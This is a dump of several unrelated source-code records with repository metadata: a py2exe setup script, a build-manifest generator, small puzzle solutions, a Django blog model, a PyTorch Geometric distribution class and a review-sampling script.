'F:\\Adel2\\GUI\\Input\\accsrh.pyc',
'F:\\Adel2\\GUI\\Input\\buyit.pyc',
'F:\\Adel2\\GUI\\Input\\IAc.pyc',
'F:\\Adel2\\GUI\\Input\\IMK.pyc',
'F:\\Adel2\\GUI\\Input\\InAcc3.pyc',
'F:\\Adel2\\GUI\\Input\\InM6.pyc',
'F:\\Adel2\\GUI\\Input\\InMolk61.pyc',
'F:\\Adel2\\GUI\\Input\\InMolk62.pyc',
'F:\\Adel2\\GUI\\Input\\Pmenu.pyc',
'F:\\Adel2\\GUI\\Input\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Input\\Specy.pyc']),
('GUI\Program', ['F:\\Adel2\\GUI\\Program\\quit.pyc',
'F:\\Adel2\\GUI\\Program\\DEF.pyc',
'F:\\Adel2\\GUI\\Program\\defin2.pyc',
'F:\\Adel2\\GUI\\Program\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Program\\pro1.pyc',
'F:\\Adel2\\GUI\\Program\\proper.pyc']),
('GUI\Report', ['F:\\Adel2\\GUI\\Report\\__init__.pyc',
'F:\\Adel2\\GUI\\Report\\AD1.pyc',
'F:\\Adel2\\GUI\\Report\\ADftar.pyc',
'F:\\Adel2\\GUI\\Report\\buyit.pyc',
'F:\\Adel2\\GUI\\Report\\MD1.pyc',
'F:\\Adel2\\GUI\\Report\\MD2.pyc',
'F:\\Adel2\\GUI\\Report\\MDftar1.pyc',
'F:\\Adel2\\GUI\\Report\\MDftar4.pyc',
'F:\\Adel2\\GUI\\Report\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Report\\RMolk61.pyc',
'F:\\Adel2\\GUI\\Report\\RMolk62.pyc',
'F:\\Adel2\\GUI\\Report\\Specy.pyc']),
('GUI\Develop', ['F:\\Adel2\\GUI\\Develop\\__init__.pyc',
'F:\\Adel2\\GUI\\Develop\\buyit.pyc',
'F:\\Adel2\\GUI\\Develop\\Pnl0.pyc']),
('GUI\Help', ['F:\\Adel2\\GUI\\Help\\__init__.pyc',
'F:\\Adel2\\GUI\\Help\\about.pyc',
'F:\\Adel2\\GUI\\Help\\Pnl0.pyc']),
('GUI\Connect', ['F:\\Adel2\\GUI\\Connect\\__init__.pyc',
'F:\\Adel2\\GUI\\Connect\\buyit.pyc',
'F:\\Adel2\\GUI\\Connect\\Pnl0.pyc']),
('Config', ['F:\\Adel2\\Config\\__init__.pyc',
'F:\\Adel2\\Config\\config.pyc',
'F:\\Adel2\\Config\\Init.pyc',
'F:\\Adel2\\Config\\program.ini']),
('Utility', ['F:\\Adel2\\Utility\\__init__.pyc',
'F:\\Adel2\\Utility\\Adaad2.pyc',
'F:\\Adel2\\Utility\\adadfa1',
'F:\\Adel2\\Utility\\B1.pyc',
'F:\\Adel2\\Utility\\barcode.png',
'F:\\Adel2\\Utility\\calcu.pyc',
'F:\\Adel2\\Utility\\calculator.bmp',
'F:\\Adel2\\Utility\\calfar01.pyc',
'F:\\Adel2\\Utility\\clacal3.pyc',
'F:\\Adel2\\Utility\\fakey.pyc'])]
includes = ['khayyam', 'wx', 'wx.dataview', 'wx.lib']
excludes = ['_gtkagg', '_tkagg', 'bsddb', 'curses', 'email', 'pywin.debugger',
'pywin.debugger.dbgcon', 'pywin.dialogs', 'tcl',
'Tkconstants', 'Tkinter']
packages = ['Config', 'Database', 'GUI', 'GUI.AuiPanel', 'GUI.Connect',
'GUI.Develop', 'GUI.Edit', 'GUI.Help', 'GUI.Input',
'GUI.Program', 'GUI.Report', 'Utility']
dll_excludes = ['libgdk-win32-2.0-0.dll', 'libgobject-2.0-0.dll', 'tcl84.dll',
'tk84.dll']
icon_resources = [(1, 'F:\\Adel2\\Res\\Icons\\f4.ico'), (2, 'F:\\Adel2\\Res\\Icons\\U5.ico')]
bitmap_resources = [(1, 'F:\\Adel2\\Utility\\calculator.bmp')]
other_resources = [(4, 24, 'F:\\Adel2\\Res\\Pics\\B10.jpg'), (5, 24, 'F:\\Adel2\\Res\\Pics\\B11.jpg'),
(6, 24, 'F:\\Adel2\\Res\\Pics\\B13.jpg'),
(7, 24, 'F:\\Adel2\\Res\\Pics\\B14.jpg'),
(8, 24, 'F:\\Adel2\\Res\\Pics\\B16.jpg'),
(1, 24, 'F:\\Adel2\\Res\\Pics\\B6.jpg'),
(2, 24, 'F:\\Adel2\\Res\\Pics\\B7.jpg'),
(3, 24, 'F:\\Adel2\\Res\\Pics\\B8.jpg')]
# This is a place where the user custom code may go. You can do almost
# whatever you want, even modify the data_files, includes and friends
# here as long as they have the same variable name that the setup call
# below is expecting.
# No custom code added
# Ok, now we are going to build our target class.
# I chose this building strategy as it works perfectly for me :-D
GUI2Exe_Target_1 = Target(
# what to build
script = "mainpro.py",
icon_resources = icon_resources,
bitmap_resources = bitmap_resources,
other_resources = other_resources,
dest_base = "mainpro",
version = "0.1",
company_name = "Chashme",
copyright = "Cheshme",
name = "Py2Exe Sample File",
)
# No custom class for UPX compression or Inno Setup script
# That's serious now: we have all (or almost all) the options py2exe
# supports. I put them all even if some of them are usually defaulted
# and not used. Some of them I didn't even know about.
setup(
# No UPX or Inno Setup
data_files = data_files,
options = {"py2exe": {"compressed": 0,
"optimize": 0,
"includes": includes,
"excludes": excludes,
"packages": packages,
"dll_excludes": dll_excludes,
"bundle_files": 3,
"dist_dir": "dist",
"xref": False,
"skip_archive": False,
"ascii": False,
"custom_boot_script": '',
}
},
zipfile = None,
console = [],
windows = [GUI2Exe_Target_1],
service = [],
com_server = [],
ctypes_com_server = []
)
# This is a place where any post-compile code may go.
# You can add as much code as you want, which can be used, for example,
# to clean up your folders or to do some particular post-compilation
# actions.
# No post-compilation code added
# And we are done. That's a setup script :-D
|
[
"[email protected]"
] | |
898c24a3febc9ddd599cab942912e2123013e61b
|
b857011826feae5dc8b68083b30e589e8179789f
|
/build-from-manifest/build_from_manifest.py
|
f046c52558dc31dec421ec2d650a7c52d92d19e4
|
[] |
no_license
|
minddrive/build-tools
|
934d862851989d80eb2eb0746e160ac571e09261
|
83a7af0bc6679c3d461d3b4f3edfad5e47ec9f74
|
refs/heads/master
| 2020-03-27T02:17:28.657669 | 2018-08-31T03:03:00 | 2018-08-31T03:03:00 | 145,779,487 | 0 | 0 | null | 2018-08-23T00:47:16 | 2018-08-23T00:47:16 | null |
UTF-8
|
Python
| false | false | 22,754 |
py
|
#!/usr/bin/env python3.6
"""
Program to generate build information along with a source tarball
for building when any additional changes have happened for a given
input build manifest
"""
import argparse
import contextlib
import gzip
import json
import os
import os.path
import pathlib
import shutil
import sys
import tarfile
import time
import xml.etree.ElementTree as EleTree
from datetime import datetime
from pathlib import Path
from subprocess import PIPE, run
from typing import Union
# Context manager for handling a given set of code/commands
# being run from a given directory on the filesystem
@contextlib.contextmanager
def pushd(new_dir):
old_dir = os.getcwd()
os.chdir(new_dir)
try:
yield
finally:
os.chdir(old_dir)
# Save current path for program
script_dir = os.path.dirname(os.path.realpath(__file__))
class ManifestBuilder:
"""
Handle creating a new manifest from a given input manifest,
along with other files needed for a new build
"""
# Files to be generated
output_filenames = [
'build.properties',
'build-properties.json',
'build-manifest.xml',
'source.tar',
'source.tar.gz',
'CHANGELOG'
]
def __init__(self, args):
"""
Initialize from the arguments and set up a set of additional
attributes for handling key data
"""
self.manifest = pathlib.Path(args.manifest)
self.manifest_project = args.manifest_project
self.build_manifests_org = args.build_manifests_org
self.force = args.force
self.push = not args.no_push
self.output_files = dict()
self.product = None
self.manifest_path = None
self.input_manifest = None
self.manifests = None
self.product_config = None
self.manifest_config = None
self.product_branch = None
self.start_build = None
self.type = None
self.parent = None
self.parent_branch = None
self.build_job = None
self.build_manifest_filename = None
self.branch_exists = 0
self.version = None
self.release = None
self.last_build_num = 0
self.build_num = None
def prepare_files(self):
"""
For the set of files to be generated, ensure any current
versions of them in the filesystem are removed, and keep
track of them via a dictionary
"""
for name in self.output_filenames:
output_file = pathlib.Path(name)
if output_file.exists():
output_file.unlink()
self.output_files[name] = output_file
def determine_product_info(self):
"""
Determine the product and manifest path from the given
input manifest
"""
path_parts = self.manifest.parts
base, rest = path_parts[0], self.manifest.relative_to(path_parts[0])
if len(path_parts) == 1:
# For legacy reasons, 'top-level' manifests
# are couchbase-server
self.product = 'couchbase-server'
self.manifest_path = base
elif base == 'cbdeps':
# Handle cbdeps projects specially
path_parts = rest.parts
self.product = f'cbdeps/{path_parts[0]}'
self.manifest_path = rest.relative_to(path_parts[0])
else:
self.product = base
self.manifest_path = rest
@staticmethod
def update_manifest_repo():
"""
Update the manifest repository
"""
print('Updating manifest repository...')
run(['git', 'fetch', '--all'], check=True)
run(['git', 'checkout', '-B', 'master', 'origin/master'], check=True)
def parse_manifest(self):
"""
Parse the input manifest (via xml.ElementTree)
"""
if not self.manifest.exists():
print(f'Manifest "{self.manifest}" does not exist!')
sys.exit(3)
self.input_manifest = EleTree.parse(self.manifest)
def get_product_and_manifest_config(self):
"""
Determine product config information related to input manifest,
along with the specific manifest information as well
"""
config_name = pathlib.Path(self.product) / 'product-config.json'
try:
with open(config_name) as fh:
self.product_config = json.load(fh)
except FileNotFoundError:
self.product_config = dict()
# Override product if set in product-config.json
self.product = self.product_config.get('product', self.product)
self.manifests = self.product_config.get('manifests', dict())
self.manifest_config = self.manifests.get(str(self.manifest), dict())
def do_manifest_stuff(self):
"""
Handle the various manifest tasks:
- Clone the manifest repository if it's not already there
- Update the manifest repository to latest revision
- Parse the manifest and gather product and manfiest config
information
"""
manifest_dir = pathlib.Path('manifest')
if not manifest_dir.exists():
run(['git', 'clone', self.manifest_project, 'manifest'],
check=True)
with pushd(manifest_dir):
self.update_manifest_repo()
self.parse_manifest()
self.get_product_and_manifest_config()
def update_submodules(self, module_projects):
"""
Update all existing submodules for given repo sync
"""
module_projects_dir = pathlib.Path('module_projects')
if not module_projects_dir.exists():
module_projects_dir.mkdir()
with pushd(module_projects_dir):
print('"module_projects" is set, updating manifest...')
# The following really should be importable as a module
run(
[f'{script_dir}/update_manifest_from_modules']
+ module_projects, check=True
)
with pushd(module_projects_dir.parent / 'manifest'):
# I have no idea why this call is required, but
# 'git diff-index' behaves erratically without it
print(run(['git', 'status'], check=True, stdout=PIPE).stdout)
rc = run(['git', 'diff-index', '--quiet', 'HEAD']).returncode
if rc:
if self.push:
print(f'Pushing updated input manifest upstream... '
f'return code was {rc}')
run([
'git', 'commit', '-am', f'Automated update of '
f'{self.product} from submodules'
], check=True)
run(['git', 'push'], check=True)
else:
print('Skipping push of updated input manifest '
'due to --no-push')
else:
print('Input manifest left unchanged after updating '
'submodules')
def set_relevant_parameters(self):
"""
Determine various key parameters needed to pass on
for building the product
"""
self.product_branch = self.manifest_config.get('branch', 'master')
self.start_build = self.manifest_config.get('start_build', 1)
self.type = self.manifest_config.get('type', 'production')
self.parent = self.manifest_config.get('parent')
self.parent_branch = \
self.manifests.get(self.parent, {}).get('branch', 'master')
# Individual manifests are allowed to have a different
# product setting as well
self.product = self.manifest_config.get('product', self.product)
self.build_job = \
self.manifest_config.get('jenkins_job', f'{self.product}-build')
def set_build_parameters(self):
"""
Determine various build parameters for given input manifest,
namely version and release
"""
build_element = self.input_manifest.find('./project[@name="build"]')
if build_element is None:
print(f'Input manifest {self.manifest} has no "build" project!')
sys.exit(4)
vers_annot = build_element.find('annotation[@name="VERSION"]')
if vers_annot is not None:
self.version = vers_annot.get('value')
print(f'Input manifest version: {self.version}')
else:
self.version = '0.0.0'
print(f'Default version to 0.0.0')
self.release = self.manifest_config.get('release', self.version)
def perform_repo_sync(self):
"""
Perform a repo sync based on the input manifest
"""
product_dir = pathlib.Path(self.product)
top_dir = pathlib.Path.cwd()
if not product_dir.is_dir():
product_dir.mkdir(parents=True)
with pushd(product_dir):
top_level = [
f for f in pathlib.Path().iterdir() if f != '.repo'
]
child: Union[str, Path]
for child in top_level:
shutil.rmtree(child) if child.is_dir() else child.unlink()
run(['repo', 'init', '-u', str(top_dir / 'manifest'), '-g', 'all',
'-m', str(self.manifest)], check=True)
run(['repo', 'sync', '--jobs=6', '--force-sync'], check=True)
def update_bm_repo_and_get_build_num(self):
"""
Update the build-manifests repository checkout, then
determine the next build number to use
"""
bm_dir = pathlib.Path('build-manifests')
if not bm_dir.is_dir():
run(['git', 'clone', f'ssh://[email protected]/'
f'{self.build_manifests_org}/build-manifests'],
check=True)
with pushd(bm_dir):
run(['git', 'reset', '--hard'], check=True)
print('Updating the build-manifests repository...')
run(['git', 'fetch', '--all'], check=True)
self.build_manifest_filename = pathlib.Path(
f'{self.product}/{self.release}/{self.version}.xml'
).resolve()
if self.build_manifest_filename.exists():
last_build_manifest = EleTree.parse(
self.build_manifest_filename
)
last_bld_num_annot = last_build_manifest.find(
'./project[@name="build"]/annotation[@name="BLD_NUM"]'
)
if last_bld_num_annot is not None:
self.last_build_num = int(last_bld_num_annot.get('value'))
self.build_num = max(self.last_build_num + 1, self.start_build)
def generate_changelog(self):
"""
Generate the CHANGELOG file from any changes that have been
found; if none are found and the build is not being forced,
write out the properties files and exit the program
"""
if self.build_manifest_filename.exists():
output = run(['repo', 'diffmanifests', '--raw',
self.build_manifest_filename],
check=True, stdout=PIPE).stdout
# Strip out non-project lines as well as testrunner project
lines = [x for x in output.splitlines()
if not (x.startswith(b' ')
or x.startswith(b'C testrunner'))]
if not lines:
if not self.force:
print(f'No changes since last build {self.version}-'
f'{self.last_build_num}; not executing '
f'new build')
json_file = self.output_files['build-properties.json']
prop_file = self.output_files['build.properties']
with open(json_file) as fh:
json.dump({}, fh)
with open(prop_file) as fh:
fh.write('')
sys.exit(0)
else:
print(f'No changes since last build {self.version}-'
f'{self.last_build_num}, but forcing new '
f'build anyway')
print('Saving CHANGELOG...')
# Need to re-run 'repo diffmanifests' without '--raw'
# to get pretty output
output = run(['repo', 'diffmanifests',
self.build_manifest_filename],
check=True, stdout=PIPE).stdout
with open(self.output_files['CHANGELOG'], 'wb') as fh:
fh.write(output)
def update_build_manifest_annotations(self):
"""
Update the build annotations in the new build manifest
based on the gathered information, also generating a
commit message for later use
"""
build_manifest_dir = self.build_manifest_filename.parent
if not build_manifest_dir.is_dir():
build_manifest_dir.mkdir(parents=True)
def insert_child_annot(parent, name, value):
annot = EleTree.Element('annotation')
annot.set('name', name)
annot.set('value', value)
annot.tail = '\n '
parent.insert(0, annot)
print(f'Updating build manifest {self.build_manifest_filename}')
with open(self.build_manifest_filename, 'w') as fh:
run(['repo', 'manifest', '-r'], check=True, stdout=fh)
last_build_manifest = EleTree.parse(self.build_manifest_filename)
build_element = last_build_manifest.find('./project[@name="build"]')
insert_child_annot(build_element, 'BLD_NUM', str(self.build_num))
insert_child_annot(build_element, 'PRODUCT', self.product)
insert_child_annot(build_element, 'RELEASE', self.release)
version_annot = last_build_manifest.find(
'./project[@name="build"]/annotation[@name="VERSION"]'
)
if version_annot is None:
insert_child_annot(build_element, 'VERSION', self.version)
last_build_manifest.write(self.build_manifest_filename)
return (f"{self.product} {self.release} build {self.version}-"
f"{self.build_num}\n\n"
f"{datetime.now().strftime('%Y/%m/%d %H:%M:%S')} "
f"{time.tzname[time.localtime().tm_isdst]}")
def push_manifest(self, commit_msg):
"""
Push the new build manifest to the build-manifests
repository, but only if it hasn't been disallowed
"""
with pushd('build-manifests'):
run(['git', 'add', self.build_manifest_filename], check=True)
run(['git', 'commit', '-m', commit_msg], check=True)
if self.push:
run(['git', 'push', 'origin', f'HEAD:refs/heads/master'],
check=True)
else:
print('Skipping push of new build manifest due to --no-push')
def copy_build_manifest(self):
"""
Copy the new build manifest to the product directory
and the root directory
"""
print('Saving build manifest...')
shutil.copy(self.build_manifest_filename,
self.output_files['build-manifest.xml'])
# Also keep a copy of the build manifest in the tarball
shutil.copy(self.build_manifest_filename,
pathlib.Path(self.product) / 'manifest.xml')
def create_properties_files(self):
"""
Generate the two properties files (JSON and INI)
from the gathered information
"""
print('Saving build parameters...')
properties = {
'PRODUCT': self.product,
'RELEASE': self.release,
'PRODUCT_BRANCH': self.product_branch,
'VERSION': self.version,
'BLD_NUM': self.build_num,
'MANIFEST': str(self.manifest),
'PARENT': self.parent,
'TYPE': self.type,
'BUILD_JOB': self.build_job,
'FORCE': self.force
}
with open(self.output_files['build-properties.json'], 'w') as fh:
json.dump(properties, fh, indent=2, separators=(',', ': '))
with open(self.output_files['build.properties'], 'w') as fh:
fh.write(f'PRODUCT={self.product}\nRELEASE={self.release}\n'
f'PRODUCT_BRANCH={self.product_branch}\n'
f'VERSION={self.version}\nBLD_NUM={self.build_num}\n'
f'MANIFEST={self.manifest}\nPARENT={self.parent}\n'
f'TYPE={self.type}\nBUILD_JOB={self.build_job}\n'
f'FORCE={self.force}\n')
def create_tarball(self):
"""
Create the source tarball from the repo sync and generated
files (new manifest and CHANGELOG). Avoid copying the .repo
information, and only copy the .git directory if specified.
"""
tarball_filename = self.output_files['source.tar']
targz_filename = self.output_files['source.tar.gz']
print(f'Creating {tarball_filename}')
product_dir = pathlib.Path(self.product)
with pushd(product_dir):
with tarfile.open(tarball_filename, 'w') as tar_fh:
for root, dirs, files in os.walk('.'):
for name in files:
tar_fh.add(os.path.join(root, name)[2:])
for name in dirs:
if name == '.repo' or name == '.git':
dirs.remove(name)
else:
tar_fh.add(os.path.join(root, name)[2:],
recursive=False)
if self.manifest_config.get('keep_git', False):
print(f'Adding Git files to {tarball_filename}')
# When keeping git files, need to dereference symlinks
# so that the resulting .git directories work on Windows.
# Because of this, we don't save the .repo directory
# also, as that would double the size of the tarball
# since mostly .repo just contains git dirs.
with tarfile.open(tarball_filename, "a",
dereference=True) as tar:
for root, dirs, files in os.walk('.', followlinks=True):
for name in dirs:
if name == '.repo':
dirs.remove(name)
elif name == '.git':
tar.add(os.path.join(root, name)[2:],
recursive=False)
if '/.git' in root:
for name in files:
# Git (or repo) sometimes creates broken
# symlinks, like "shallow", and Python's
# tarfile module chokes on those
if os.path.exists(os.path.join(root, name)):
tar.add(os.path.join(root, name)[2:],
recursive=False)
print(f'Compressing {tarball_filename}')
with open(tarball_filename, 'rb') as f_in, \
gzip.open(targz_filename, 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
os.unlink(tarball_filename)
def generate_final_files(self):
"""
Generate the new files needed, which are:
- new build manifest
- properties files (JSON and INI-style)
- source tarball (which includes the manifest)
"""
self.copy_build_manifest()
self.create_properties_files()
self.create_tarball()
def create_manifest(self):
"""
The orchestration method to handle the full program flow
from a high-level overview. Summary:
- Prepare for various key files, removing any old ones
- Determine the product information from the config files
- Setup manifest repository and determine build information
from it
- If there are submodules, ensure they're updated
- Set the relevant and necessary paramaters (e.g. version)
- Do a repo sync based on the given manifest
- Update the build-manifests repository and determine
the next build number to use
- Generate the CHANGELOG and update the build manifest
annotations
- Push the generated manifest to build-manifests, if
pushing is requested
- Generate the new build manifest, properties files, and
source tarball
"""
self.prepare_files()
self.determine_product_info()
self.do_manifest_stuff()
module_projects = self.manifest_config.get('module_projects')
if module_projects is not None:
self.update_submodules(module_projects)
self.set_relevant_parameters()
self.set_build_parameters()
self.perform_repo_sync()
self.update_bm_repo_and_get_build_num()
with pushd(self.product):
self.generate_changelog()
commit_msg = self.update_build_manifest_annotations()
self.push_manifest(commit_msg)
self.generate_final_files()
def parse_args():
"""Parse and return command line arguments"""
parser = argparse.ArgumentParser(
description='Create new build manifest from input manifest'
)
parser.add_argument('--manifest-project', '-p',
default='git://github.com/minddrive/manifest.git',
help='Alternate Git URL for manifest repository')
parser.add_argument('--build-manifests-org', default='minddrive',
help='Alternate GitHub organization for '
'build-manifests')
parser.add_argument('--force', '-f', action='store_true',
help='Produce new build manifest even if there '
'are no repo changes')
parser.add_argument('--no-push', action='store_true',
help='Do not push final build manifest')
parser.add_argument('manifest', help='Path to input manifest')
return parser.parse_args()
def main():
"""Initialize manifest builder object and trigger the build"""
manifest_builder = ManifestBuilder(parse_args())
manifest_builder.create_manifest()
if __name__ == '__main__':
main()
|
[
"[email protected]"
] | |
3387a7b1ab5c092a4be3f73958c4f37a2aec6a5c
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02683/s728076842.py
|
530d406c4a8a8bf681c980d60d4d26bc44d72770
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 390 |
py
|
import numpy as np
n,m,x=map(int,input().split())
a=2**64
b=[np.array(list(map(int,input().split())),"i8")for i in range(n)]
for i in range(2**n):
c=bin(i)[2:]
c="0"*(n-len(c))+c
l=np.zeros(m)
q=0
for j in range(n):
if c[j]=="1":
q+=b[j][0]
l+=b[j][1:]
if np.min(l)>=x:
a=min(a,q)
if a==2**64:
print(-1)
else:
print(a)
|
[
"[email protected]"
] | |
d9e7c56938990536056e245fd9a4e8f269ca531c
|
a54aaaf50c84b8ffa48a810ff9a25bfe8e28ba96
|
/euler017.py
|
7b50a537c65bdf4546e8de4b9c5b747a69368e15
|
[] |
no_license
|
danielmmetz/euler
|
fd5faefdfd58de04e744316618f43c40e6cbb288
|
fe64782617d6e14b8b2b65c3a039716adb789997
|
refs/heads/master
| 2021-01-17T08:44:26.586954 | 2016-05-12T02:35:10 | 2016-05-12T02:35:10 | 40,574,287 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 885 |
py
|
"""
If the numbers 1 to 5 are written out in words: one, two, three, four, five,
then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.
If all the numbers from 1 to 1000 (one thousand) inclusive were written out in
words, how many letters would be used?
NOTE: Do not count spaces or hyphens. For example, 342 (three hundred and forty-
two) contains 23 letters and 115 (one hundred and fifteen) contains 20 letters.
The use of "and" when writing out numbers is in compliance with British usage.
"""
from collections import Counter
from num2words import num2words
from string import ascii_lowercase as letters
def answer(bound):
char_counts = Counter()
for num in xrange(1, bound+1):
char_counts += Counter(char for char in num2words(num, lang='en_GB'))
return sum(char_counts[char] for char in letters)
if __name__ == '__main__':
print answer(1000)
|
[
"[email protected]"
] | |
21fb9340d7f32f6154426ff550bec28acbfdafb6
|
203d90b6f0a0fe38cf6a77d50c6e5aa528e4d50d
|
/blog/models.py
|
4398a5455471cb25c799d12afc32868947063c59
|
[] |
no_license
|
leayl/mysite
|
dcc92bedc27b6206ec566f5b4421ee517a838ddd
|
b7974ce9fffe5c4f61d1c0d4facdd7c7860c0204
|
refs/heads/master
| 2021-06-23T23:53:39.046179 | 2019-09-23T03:51:45 | 2019-09-23T03:51:45 | 181,919,893 | 0 | 0 | null | 2021-06-10T21:23:46 | 2019-04-17T15:31:54 |
Python
|
UTF-8
|
Python
| false | false | 1,109 |
py
|
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields import exceptions
from django.contrib.auth.models import User
from ckeditor_uploader.fields import RichTextUploadingField
from read_statistics.models import ReadNumExtendMethod
class BlogType(models.Model):
title = models.CharField(max_length=32)
def __str__(self):
return self.title
class Blog(models.Model,ReadNumExtendMethod):
"""
继承了read_statistics.models中的ReadNumExtendMethod
获得get_read_num方法,可在admin中直接使用显示在后台
"""
title = models.CharField(max_length=32)
blog_type = models.ForeignKey(BlogType, on_delete=models.DO_NOTHING)
content = RichTextUploadingField()
author = models.ForeignKey(User, on_delete=models.DO_NOTHING)
# read_times = models.IntegerField(default=0)
created_time = models.DateTimeField(auto_now_add=True)
last_update_time = models.DateTimeField(auto_now=True)
def __str__(self):
return self.title
class Meta:
ordering=['-created_time']
|
[
"[email protected]"
] | |
8bab37daf96d71aa280e74d681d7515f1291bf03
|
c9f67529e10eb85195126cfa9ada2e80a834d373
|
/lib/python3.5/site-packages/torch/distributions/geometric.py
|
1e4b121cd7b4cfcccd548bf86ff634e3392b7ebe
|
[
"Apache-2.0"
] |
permissive
|
chilung/dllab-5-1-ngraph
|
10d6df73ea421bfaf998e73e514972d0cbe5be13
|
2af28db42d9dc2586396b6f38d02977cac0902a6
|
refs/heads/master
| 2022-12-17T19:14:46.848661 | 2019-01-14T12:27:07 | 2019-01-14T12:27:07 | 165,513,937 | 0 | 1 |
Apache-2.0
| 2022-12-08T04:59:31 | 2019-01-13T14:19:16 |
Python
|
UTF-8
|
Python
| false | false | 2,923 |
py
|
from numbers import Number
import torch
from torch.distributions import constraints
from torch.distributions.distribution import Distribution
from torch.distributions.utils import broadcast_all, probs_to_logits, logits_to_probs, lazy_property, _finfo
from torch.nn.functional import binary_cross_entropy_with_logits
class Geometric(Distribution):
r"""
Creates a Geometric distribution parameterized by `probs`, where `probs` is the probability of success of Bernoulli
trials. It represents the probability that in k + 1 Bernoulli trials, the first k trials failed, before
seeing a success.
Samples are non-negative integers [0, inf).
Example::
>>> m = Geometric(torch.tensor([0.3]))
>>> m.sample() # underlying Bernoulli has 30% chance 1; 70% chance 0
2
[torch.FloatTensor of size 1]
Args:
probs (Number, Tensor): the probabilty of sampling `1`. Must be in range (0, 1]
logits (Number, Tensor): the log-odds of sampling `1`.
"""
arg_constraints = {'probs': constraints.unit_interval}
support = constraints.nonnegative_integer
def __init__(self, probs=None, logits=None, validate_args=None):
if (probs is None) == (logits is None):
raise ValueError("Either `probs` or `logits` must be specified, but not both.")
if probs is not None:
self.probs, = broadcast_all(probs)
if not self.probs.gt(0).all():
raise ValueError('All elements of probs must be greater than 0')
else:
self.logits, = broadcast_all(logits)
probs_or_logits = probs if probs is not None else logits
if isinstance(probs_or_logits, Number):
batch_shape = torch.Size()
else:
batch_shape = probs_or_logits.size()
super(Geometric, self).__init__(batch_shape, validate_args=validate_args)
@property
def mean(self):
return 1. / self.probs - 1.
@property
def variance(self):
return (1. / self.probs - 1.) / self.probs
@lazy_property
def logits(self):
return probs_to_logits(self.probs, is_binary=True)
@lazy_property
def probs(self):
return logits_to_probs(self.logits, is_binary=True)
def sample(self, sample_shape=torch.Size()):
shape = self._extended_shape(sample_shape)
with torch.no_grad():
u = self.probs.new(shape).uniform_(_finfo(self.probs).tiny, 1)
return (u.log() / (-self.probs).log1p()).floor()
def log_prob(self, value):
if self._validate_args:
self._validate_sample(value)
value, probs = broadcast_all(value, self.probs.clone())
probs[(probs == 1) & (value == 0)] = 0
return value * (-probs).log1p() + self.probs.log()
def entropy(self):
return binary_cross_entropy_with_logits(self.logits, self.probs, reduce=False) / self.probs
|
[
"[email protected]"
] | |
380d17872d9ed8769bac3610758bd177dacef41e
|
49b9c68ab746cb43770fd35771847bd9c18817e6
|
/recsys/experiment/sampler.py
|
f5ab7aa89849497d96e70142acbc65112590a16a
|
[] |
no_license
|
kobauman/signature
|
06a2c579381faa780d79ab3e662c6ec6d28b8555
|
d123ff1557b9d3f81ef7ce7a0a83ea81d614675b
|
refs/heads/master
| 2021-01-21T12:11:42.419877 | 2016-03-25T19:48:08 | 2016-03-25T19:48:08 | 22,729,978 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,290 |
py
|
import logging
import random
import json
import os
'''
Sample TRAIN and TEST
Input: reviews, prob
Output: list of reviews in TEST
'''
def sampler(path, reviews_filename, probs = [0.4, 0.8], busThres = 0, userThres = 0):
logger = logging.getLogger('signature.sampler')
logger.info('starting sampling')
#load reviews
review_file = open(reviews_filename,"r")
bus_info = dict()
user_info = dict()
reviews = list()
for counter, line in enumerate(review_file):
reviews.append(json.loads(line))
busId = reviews[-1]['business_id']
userId = reviews[-1]['user_id']
bus_info[busId] = bus_info.get(busId,0)
bus_info[busId]+=1
user_info[userId] = user_info.get(userId,0)
user_info[userId]+=1
if not counter %10000:
logger.info('%d reviews processed'%counter)
review_file.close()
r_num = len(reviews)
#clean by business
good_bus = set([bus for bus in bus_info if bus_info[bus] > busThres])
reviews = [review for review in reviews if review['business_id'] in good_bus]
good_user = set([user for user in user_info if user_info[user] > userThres])
reviews = [review for review in reviews if review['user_id'] in good_user]
logger.info('Num of businesses before = %d, after = %d'%(len(bus_info),len(good_bus)))
logger.info('Num of users before = %d, after = %d'%(len(user_info),len(good_user)))
logger.info('Num of reviews before = %d, after = %d'%(r_num,len(reviews)))
#shuffle
random.shuffle(reviews)
thres1 = len(reviews)*probs[0]
thres2 = len(reviews)*probs[1]
train_filename = reviews_filename.replace('_features.json','_train.json')
stat_filename = reviews_filename.replace('_features.json','_stat.json')
extrain_filename = reviews_filename.replace('_features.json','_extrain.json')
test_filename = reviews_filename.replace('_features.json','_test.json')
train_file = open(train_filename,"w")
stat_file = open(stat_filename,"w")
extrain_file = open(extrain_filename,"w")
test_file = open(test_filename,"w")
counters = [0,0,0,0]
for counter, review in enumerate(reviews):
review = json.dumps(review)
if counter < thres2:
train_file.write(review+'\n')
counters[0] += 1
if counter < thres1:
stat_file.write(review+'\n')
counters[1] += 1
elif counter < thres2:
extrain_file.write(review+'\n')
counters[2] += 1
else:
test_file.write(review+'\n')
counters[3] += 1
train_file.close()
stat_file.close()
extrain_file.close()
test_file.close()
logger.info('DONE %s'%str(counters))
try:
os.stat(path+'results/')
except:
os.mkdir(path+'results/')
outfile = open(path+'results/Numbers_stat.txt','w')
outfile.write('Businesses only with > %d reviews\nUsers only with > %d reviews'%(busThres,userThres))
outfile.write('\nTrain: %d,\n Stat: %d,\nExtrain: %d,\nTest: %d'%(counters[0],counters[1],counters[2],counters[3]))
outfile.close()
|
[
"[email protected]"
] | |
06ebfc7c0dd8d9fa2e442b989356c0541f537915
|
e4eca3e87148f9afc93233b13c54c5e065f704b1
|
/pyMRA/multiprocess/example.py
|
6729aaca6a0ed1bb1006d371176603e55628d452
|
[
"MIT"
] |
permissive
|
katzfuss-group/pyMRA
|
